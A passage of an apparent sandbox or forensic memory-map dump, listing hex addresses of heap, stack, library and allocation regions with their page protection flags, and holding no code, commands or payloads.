page read and write
|
||
290E000
|
stack
|
page read and write
|
||
13F809B5000
|
trusted library allocation
|
page read and write
|
||
4ABF000
|
heap
|
page read and write
|
||
13F81DBA000
|
trusted library allocation
|
page read and write
|
||
13FEA1CE000
|
heap
|
page read and write
|
||
4A91000
|
heap
|
page read and write
|
||
7850000
|
trusted library allocation
|
page read and write
|
||
2661000
|
heap
|
page read and write
|
||
2D94000
|
heap
|
page read and write
|
||
13F81D97000
|
trusted library allocation
|
page read and write
|
||
4A95000
|
heap
|
page read and write
|
||
2693000
|
heap
|
page read and write
|
||
9DB000
|
heap
|
page read and write
|
||
8717000
|
heap
|
page read and write
|
||
935000
|
heap
|
page read and write
|
||
7FF887CF0000
|
trusted library allocation
|
page read and write
|
||
43B8000
|
heap
|
page read and write
|
||
4AB6000
|
heap
|
page read and write
|
||
4DCC000
|
heap
|
page read and write
|
||
2CEA000
|
stack
|
page read and write
|
||
13FE9C78000
|
heap
|
page read and write
|
||
43AF000
|
heap
|
page read and write
|
||
83C0000
|
heap
|
page read and write
|
||
247EC000
|
heap
|
page read and write
|
||
70D0000
|
direct allocation
|
page read and write
|
||
3160000
|
heap
|
page read and write
|
||
5398000
|
trusted library allocation
|
page read and write
|
||
9C06000
|
direct allocation
|
page execute and read and write
|
||
13FE9E30000
|
heap
|
page read and write
|
||
2651000
|
heap
|
page read and write
|
||
7E0000
|
heap
|
page read and write
|
||
43AF000
|
heap
|
page read and write
|
||
75D4000
|
heap
|
page read and write
|
||
24605000
|
heap
|
page read and write
|
||
78E0000
|
trusted library allocation
|
page read and write
|
||
43B8000
|
heap
|
page read and write
|
||
8960000
|
trusted library allocation
|
page read and write
|
||
8A37000
|
heap
|
page read and write
|
||
9DA000
|
heap
|
page read and write
|
||
8AA4000
|
heap
|
page read and write
|
||
4AF6000
|
heap
|
page read and write
|
||
4AFF000
|
stack
|
page read and write
|
||
4EE4000
|
heap
|
page read and write
|
||
2559C000
|
heap
|
page read and write
|
||
24020000
|
remote allocation
|
page read and write
|
||
C30000
|
heap
|
page read and write
|
||
4ABB000
|
heap
|
page read and write
|
||
41B000
|
system
|
page execute and read and write
|
||
13FEA231000
|
heap
|
page read and write
|
||
2684000
|
heap
|
page read and write
|
||
4A91000
|
heap
|
page read and write
|
||
2DEE000
|
unkown
|
page read and write
|
||
43B5000
|
heap
|
page read and write
|
||
43A9000
|
heap
|
page read and write
|
||
6E1E000
|
stack
|
page read and write
|
||
8A37000
|
heap
|
page read and write
|
||
5345000
|
trusted library allocation
|
page read and write
|
||
48BF000
|
stack
|
page read and write
|
||
3060000
|
trusted library allocation
|
page execute and read and write
|
||
88FE000
|
stack
|
page read and write
|
||
268E000
|
heap
|
page read and write
|
||
13FE7D60000
|
heap
|
page read and write
|
||
86FB000
|
heap
|
page read and write
|
||
247EC000
|
heap
|
page read and write
|
||
437E000
|
unkown
|
page read and write
|
||
B4377C000
|
stack
|
page read and write
|
||
8A44000
|
heap
|
page read and write
|
||
26A6000
|
heap
|
page read and write
|
||
2694000
|
heap
|
page read and write
|
||
8A37000
|
heap
|
page read and write
|
||
4C91000
|
heap
|
page read and write
|
||
3221000
|
heap
|
page read and write
|
||
8A9A000
|
heap
|
page read and write
|
||
2D60000
|
heap
|
page readonly
|
||
4ABF000
|
heap
|
page read and write
|
||
4C90000
|
trusted library allocation
|
page read and write
|
||
2684000
|
heap
|
page read and write
|
||
13F902FA000
|
trusted library allocation
|
page read and write
|
||
860C000
|
stack
|
page read and write
|
||
24921000
|
heap
|
page read and write
|
||
7060000
|
direct allocation
|
page read and write
|
||
8950000
|
trusted library allocation
|
page read and write
|
||
7FF887A86000
|
trusted library allocation
|
page read and write
|
||
5044000
|
trusted library allocation
|
page read and write
|
||
B4480B000
|
stack
|
page read and write
|
||
7FF887D30000
|
trusted library allocation
|
page read and write
|
||
43CA000
|
heap
|
page read and write
|
||
4AF6000
|
heap
|
page read and write
|
||
13F81A37000
|
trusted library allocation
|
page read and write
|
||
5030000
|